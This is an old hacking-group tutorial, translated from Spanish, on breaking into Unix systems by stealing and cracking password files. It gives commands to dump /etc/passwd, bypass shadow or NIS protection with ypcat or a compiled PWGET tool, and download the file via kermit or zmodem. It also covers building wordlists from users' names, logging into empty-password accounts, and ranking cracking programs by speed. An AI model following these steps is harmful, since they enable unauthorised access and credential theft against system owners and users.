Cracking Unix Passwords

By Zebal

Translated by ToKsURi

Introduction-

To gain access into a Unix system, its necessary to have a username and a password, and what better place to find them than from /etc/passwd :-) This is the file which holds the list of usernames and passwords in Unix, aswell as other kind of information in relation which each username... The problem is that these passwords are encrypted. Let see the appearence of one of these files:

    root:XY53yyh3gMvvE:0:3::/root:/bin/sh
    daemon:*:1:5::/:/bin/sh
    bin:*:2:2::/bin:/bin/sh
    adm:*:4:4::/usr/adm:/bin/sh
    uucp:*:5:3::/usr/spool/ucppublic:/usr/lib/uucp/uucico
    lp:*:9:7::/usr/spool/lp:/bin/sh
    hpdb:*:27:1:ALLBASE:/:/bin/sh
    user1:g.um3CCF4uVIk:247:25:DArcy
    Martín:/disc/users/pepito:/bin/csh
    user2:RckFa8/idTCFg:248:24:Billy Corgan:/disc/users/fulanito:/bin/csh
    user3:axX/MxQZr37tA:0:3:James Iha:/disc/users/menganito:/bin/csh

As you can see, each line corresponds to a user, and contains ( in order ) the username, the encrypted password, the user_id, the group_id, the real name, the home directory and the shell loaded at the startup... The format may change slightly, but basically it is this one. As you can see, each field is separated from the previous and next field by a colom " : " In some lines, the password field is " * " This encrypted password is invalid, that is, they dont belong to an existing password, therefore you may not access those accounts. Another detail we must take into consideration are all those users whose user_id is "0", as ROOT. These users are ROOT by all means, therefore, they have the same rights as the actual ROOT. As you can observe, "user3" has a user_id=0, which means it is a ROOT. In a similar way, the users without user_id=0 may still have access to some ROOT actions by the fact that they belong to the ROOT group.

Ok, now we have to "dencrypt" the passwords. The problem is that Unix uses a one-way encryption mechanism, which means it cant be "dencrypted". Then... how does the LOGIN checks whether the password is correct? What happens is that the system encrypts the password that we enter and it is compared with the text string belonging to the actual password in the passwd file. If they are identical then the password is correct and the system lets you in. The way of attacking a unix passwd file is precisely the same as LOGIN does. What the cracker does is encrypt maaaaaaaaaaaaany words and check if any of the encrypted words match with the encrypted password in the passwd file. If they match, we have our password! And if not, we will try on with a different word. For doing this we need three things: 1- A word list to encrypt and check. 2- A List with the encrypted passwords (passwd file) 3- A program which does all the job.

STEP ONE: Obtaining the Word List

Be creative. You may write your own word list with names, surnames, famous people, numbers, months, bad words, companies, server names and the so used sex, love and god. Anything is valid as long as you think it may be used as a password in the system you want to hack. Luckly, you may find in internet word lists waiting to be checked. One of the most interesting places for obtaining word lists is: ftp://sable.ox.ac.uk/pub/wordlists/. There are many wordlists, but it is slightly slow. Fortunately, there is a mirror of this server in Spain, at ftp://sun.rediris.es/mirror/sable/wordlists/ which goes much more quicker, specially if your internet connection is inside the spanish network. Anyway, youy may always search in Yahoo or Lycos for "dictionar" or by "wordlis" and you'll find many sites with wordlists. A good tip is to try with the names and surnames of the users of the system you are trying to crack.... There is maaaaaaany people who uses as password their own names or their girlfriend's name. So a word list with the names and surnames of the users is a good chance of obtaining passwords. Another word which is a common a password is the username itself. Also many people uses "password". It is a good recommendation to extract all of the words inside the passwd file and try them as password. For doing this there are many utilities, some of them are even distributed together with the cracker. I dont think you'll find very difficult to find a program which extracts the names, surnames and usernames of the users in a /etc/passwd file. There are even utilities which their only function is to make word lists.

STEP 2: Obtaining the password list

This is slightly more difficult. If you have an account in the system you want to hack, you may always do a "cat /etc/passwd" If they dont have Shadow Passwords or NIS, a list like the one you have seen at the beginning will appear. Else, you will see somehing like this:

root:XY53yyh3gMvvE:0:3::/root:/bin/sh
daemon:*:1:5::/:/bin/sh
bin:*:2:2::/bin:/bin/sh
adm:*:4:4::/usr/adm:/bin/sh
uucp:*:5:3::/usr/spool/ucppublic:/usr/lib/uucp/uucico
lp:*:9:7::/usr/spool/lp:/bin/sh
hpdb:*:27:1:ALLBASE:/:/bin/sh
user1:g.um3CCF4uVIk:247:25:DArcy
Martín:/disc/users/pepito:/bin/csh
user2:RckFa8/idTCFg:248:24:Billy Corgan:/disc/users/fulanito:/bin/csh
user3:axX/MxQZr37tA:0:3:James Iha:/disc/users/menganito:/bin/csh

where the password will be something like "*" or "x" or anything which contains an asterisc "*" as "*NOPASSWORD*". In this case, the file /etc/passwd is of no use, as Shadow Passwords or NIS is installed. Then, you may try doing a "ypcat /etc/passwd" With this you may probably find via screen the real list of passwords. In the event you dont have enough rights to run "ypcat", or if it isnt installed or if after doing it junk appears again, you will have to make use of other programs to obtain the passwords. I reccommend you PWGET. It is very easy to find, just look for PWGET.TAR.GZ or PWGET.TGZ in any archie, or in Lycos or in Yahoo. Sure you will find it. Once you have it, you just need to upload it to the server you want to hack, unzip it ("gzip -d -f PWGET.TGZ"), untar it ("tar -x -f PWGET.TAR"), compile it ("cc -o pwget pwget.c") and run it ("./pwget") by which you will see in the screen the password list. If you want the list in a file, you just have to redirect the screen output into a file:

$ ./pwget > file
or else
$ ypcat /etc/passwd > file
or else
$ cat /etc/passwd > file

The same way you will redirect the output under DOS... Now, for downloading the file you may use FTP, Kermit or the ZModem/Ymodem/Xmodem. For downloading the file via kermit or Zmodem you will need that your telnet program supports this protocols (as NetTerm), and that the Unix machine also does (that is, it has the neccesary file installed). Kermit is usually installed in all systems:

$ kermit
kermit> set file type ascii (or "text", depends on systems)
kermit> set send pack 1000
kermit> set rec pack 1000
kermit> set file type 2 (or 3, as you prefer)
kermit> send fichero
... Download->Kermit
CTRL+C
kermit> quit
$

You may also use Zmodem, if it is installed:

$ sz fichero
... Download->ZModem
$

Step 3: Cracking the password list

Now that you have the password list and several word lists, you need a program which encrypts the words and afterwards checks them with the encrypted passwords in the password list. There are many programs you may use. Now I will briefly comment the characteristics of the programs (an their names, so that you may look for them in the net), but first I would like to give some tips for obtaining the passwords in less time.

Delete from the password file all lines whose password is invalid ("*", "*NOPASSWORD*", etc)

Arrange the lines of the password file by the two first characters of the encrypted password. Some of the programs I comment, do this automatically, but some dont. With these two steps you may save a lot of time depending in the cracker you use.

Those users who have the password field empty

(user1::101:1:Manolito:/usr/user1:/bin/sh) dont have a password at all, therefore they are lines you may delete from the file. When you login, simply by typing the username you will have access. And in the event it asks you for a password, press ENTER without writing a password. :-)

CRACKERS:

Cracker Jack 1.4 (JACK14*.*, CJACK*.*) It is the most extended in use, unleast as far as I know. It is almost in every hacking site of internet. Works under DOS and OS/2, and is quite fast. In the same "distribution" there are many utilities which treat the word list.

You may search for it in the web.

Brute 2.00 (BRUTE*.*) Another cracker quite popular even beeing so slow. I think there is a faster version, but uses an encrypting algorythm which isnt completely correct (although it is faster), and therefore it doesnt crack all passwords it should. I havent found any copy of this version, which means i wasnt able to test it. Works under DOS.

StarCrack 0.64ß (STARCRAK*.*) This is a cracker with plenty of options, which allows to handle words while they are tested. It is quicker than Cracker Jack, works under DOS and is very complete. It is quite new, and is also a Beta, so i expect a much better version comming soon... :-? Has plenty of options and allows doing all kinds of things.

You can find it at the StarCrack homepage: http://www.chez.com/thes/starcrak.html

Hades 1.00a (HADES*.*) Another cracker for DOS. This works different from the rest of crackers. Instead of encrypting a word and checking it against the passwords of all users, it encrypts all the words and then checks them with the password of a user. Once it has finished with one user, it follows on with the next one. Due to this way of working, it makes too much I/O of disk, which slows down the whole proccess. It's output is slightly improved if we arrange the password file by the encrypted password field, as this way the cracker will check various users at the same time. It can also be improved by having all the lists (password and word lists) in memory in a virtual disc.

Guess 2.1 (GUESS*.*) Cracker for DOS, extremelly slow. It has memory problems if we try to use it with password files with more than 1000 lines

PCUPC 2.01 (PCUPC*.*) Another cracker for DOS. This one has memory problems if we try to crack password files with more than 600/700 lines.

Killer Cracker 9.5 (DJKC95*.*, KC*.*) As Guess, a very slow cracker for DOS and which gives problems with password files longer than 1000 lines.

Xit 2.0 (XIT20*.*) Cracker for DOS. It is the slowest i've found. As its name says, it is a SHIT! :-)

HellFire Cracker 1.3 (HC130*.*) Cracker for Dos. Requires a 386 with co-processor so it can work, but for some strange reason it hangs in my pentium and in my 486, therefore i cant tell you how good it is. Maybe if you have a 386 you'll be able to use it satisfactory. The program includes a 387 emulator, just in case you dont have a co-processor. Any way, it is a very old program which surely wont be very fast.

John the ripper 1.4 (UCFJOHN3*.*) Cracker for DOS/Win32/Linux and any other system, as it is distributed together with the source code. Works in a similiar way to Cracker Jack but includes more options and is quite fast. It is a new release (when the doc was written :) courtesy of UCF (United Cracking Force) and may be a bit difficult to find, but it is really useful and fast. It doesnt have as many options as the Star Crack, but is much faster. It even allows many options for treating the word list you use...

This is the homepage of John the Ripper: http://www.false.com/security/john/

Here you have a table comparing all the different crackers. In the same machine and with the same word and password lists. Some of them took too long, and I aborted the proccess of cracking the passwords. In this cases, I calculated the estimated time they will take to finish according to the time taken (1 hour) and the amount of words checked for that time.
These are the results, ordered by speed:

Cracker	Time	Checks per second	Comments
John the ripper 1.4	6'15''	26667c/s	.
John the ripper 1.31	6'30''	25641c/s	.
John the ripper 1.0	8'05''	20619c/s	.
Star Crack 0.64ß	9'15''	18018c/s	.
Star Crack 0.51ß	11'25''	14599c/s	.
Cracker Jack 1.4	13'33''	12300c/s	.
Cracker Jack 1.3 386	14'55''	11173c/s	.
Cracker Jack 1.3 8086	22'22''	7452c/s	.
Hades 1.00a	47'05''	3540c/s	.
Brute 2.00	(est)59'54''	2782c/s	.
PCUPC 2.01	(est)135'37''	1229c/s	Only allows password files shorter than 500 lines
Guess 2.1	(est)141'58''	1174c/s	Only allows password files shorter than 1000 lines
Killer Cracker 9.5	(est)151'12''	1105c/s	Only allows password files shorter than 1000 lines
Xit 2.0	(est)195'37''	852c/s	.
Hellfire Cracker 1.3	infinito	0c/s	It hanged and couldn't be tested

This test was carried on a Pentium 133, with 16mb RAM, with all the data in the hard disc, with a reading cache of 2mb and without pre-processing the password file or the the word list. The word list contained 10 000 words and the password file 1 000 passwords. 554 passwords had to be found. Some of them took too long so i estimated the time according to what they have cracked until the moment of stopping them, therefore i dont know if they would have found all the passwords. I have just included them in the table, in case some of you uses it. You can now see there are better things!

As you can see, John the Ripper encrypts almost two times more passwords per seconds than the Cracker Jack. I must admitt that the file with which i made the testing seems to be quite favorable to John the Ripper, as 20 000 c/s cant be obtained very often. Anyway, the comparison is significative of the speed by which the passwords are cracked by each of the programs.

I hope that with this mini-introduction to the art of cracking Unix passwords you can enjoy a good time; and I also hope that I haven't bored you too much. If you have any question/comment/suggestion/destructive-comment, you may send an e-mail to z3b4l@iname.com. Greetings! ;-)

And for any comment about the traslation, you may also send mail to: toksuri@thepentagon.com (dont be too hard with your comments :c)

(C) 1997-2001 by !Hispahack
Para ver el web en las mejores condiciones, usa una resolución de 800x600 y Netscape Navigator